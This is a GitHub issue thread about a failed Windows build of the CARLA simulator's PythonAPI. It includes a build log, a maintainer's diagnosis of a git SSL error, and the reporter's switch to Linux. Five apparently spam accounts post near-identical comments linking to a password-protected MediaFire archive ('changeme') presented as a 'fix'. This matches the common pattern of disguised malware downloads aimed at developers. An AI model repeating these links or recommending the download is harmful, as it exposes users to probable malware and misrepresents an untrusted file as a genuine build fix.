carla-simulator/carla #8086: Make PythonAPI failed when build carla

Sephiroth1118, 2024-08-28:
CARLA version: carla-dev
Platform/OS: Windows 10
Problem you have experienced: make PythonAPI failed
This is the make log:
D:\Carla\carla-dev>make PythonAPI
-[BuildUE4Plugins]: [Batch params]: --build --all
fatal: unable to access 'https://github.com/carla-simulator/StreetMap.git/': OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 0
HEAD is now at 260273d Correct descriptor
-[BuildUE4Plugins]: STREETMAP has been successfully installed in "D:\Carla\carla-dev\Unreal\CarlaUE4\Plugins\"
-[Setup]: [Batch params]: --boost-toolset msvc-14.2 --generator "" --all
-[Setup]: Asynchronous jobs:  16
-[Setup]: Boost toolset:      msvc-14.2
-[Setup]: Generator:          "Visual Studio 16 2019"
-[Setup]: Install directory:  "D:\Carla\carla-dev\Build\"
-[Setup]: Installing zlib...
    -[install_zlib]: [Batch params]: --build-dir "D:\Carla\carla-dev\Build\"
    -[install_zlib]: A zlib installation already exists.
    -[install_zlib]: Delete "D:\Carla\carla-dev\Build\zlib-install\" if you want to force a rebuild.
    -[install_zlib]: Exiting...
系统找不到指定的路径。
已复制         0 个文件。
-[Setup]: Installing libpng...
    -[install_libpng]: [Batch params]: --build-dir "D:\Carla\carla-dev\Build\" --zlib-install-dir "D:\Carla\carla-dev\Build\zlib-install\"
    -[install_libpng]: A libpng installation already exists.
    -[install_libpng]: Delete "D:\Carla\carla-dev\Build\libpng-1.2.37-install\" if you want to force a rebuild.
    -[install_libpng]: Exiting...
-[Setup]: Installing rpclib...
    -[install_rpclib]: [Batch params]: --build-dir "D:\Carla\carla-dev\Build\" --generator "Visual Studio 16 2019"
    -[install_rpclib]: A rpclib installation already exists.
    -[install_rpclib]: Delete "D:\Carla\carla-dev\Build\rpclib-install\" if you want to force a rebuild.
    -[install_rpclib]: Exiting...
-[Setup]: Installing Google Test...
    -[install_gtest]: [Batch params]: --build-dir "D:\Carla\carla-dev\Build\" --generator "Visual Studio 16 2019"
系统找不到指定的批处理标签 - already_build
[image]

-[Setup]:
   Ok, and error ocurred, don't panic
   We have different platforms where you can find some help :)

   - Make sure you have read the documentation:
       http://carla.readthedocs.io/en/latest/how_to_build_on_windows/

   - If the problem persists, you can ask on our Github's "Building on Windows" issue:
       https://github.com/carla-simulator/carla/issues/21
The chinese part means "The system could not find the batch tag specified".

What you expected to happen:
I haven't see this issue before and I want to know what the problem is.
Steps to reproduce:
Just follow the steps in windows build. The only difference is I do not find Windows 8.1 SDK in my VS 2019 and use Windows 10 SDK.
Other information (documentation you consulted, workarounds you tried):
I didn't know what's happening so I do not know how to sovle it. Just tried some basic solution like reinstall VS 2019.

li371359001, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

rajnikyadav, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

HeinousAgenda38, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

MarcelPiNacy-CVC, 2024-08-30:
Hi,

The key part is `fatal: unable to access 'https://github.com/carla-simulator/StreetMap.git/': OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 0`. This could be a firewall issue or a git config problem.

lt-wang, 2024-09-01:
我也是这个问题

Sephiroth1118, 2024-09-02:
> Hi,
> 
> The key part is `fatal: unable to access 'https://github.com/carla-simulator/StreetMap.git/': OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 0`. This could be a firewall issue or a git config problem.

Thank you very much for your replay! I noticed this error and fixed it, but the make problem still remained. I have no other way so I changed to linux build. Now it works well :D.

Sephiroth1118, 2024-09-02:
> 我也是这个问题

我最后也没找到方法，现在用linux build了，linux build基本没出过什么问题，操作也更简单一点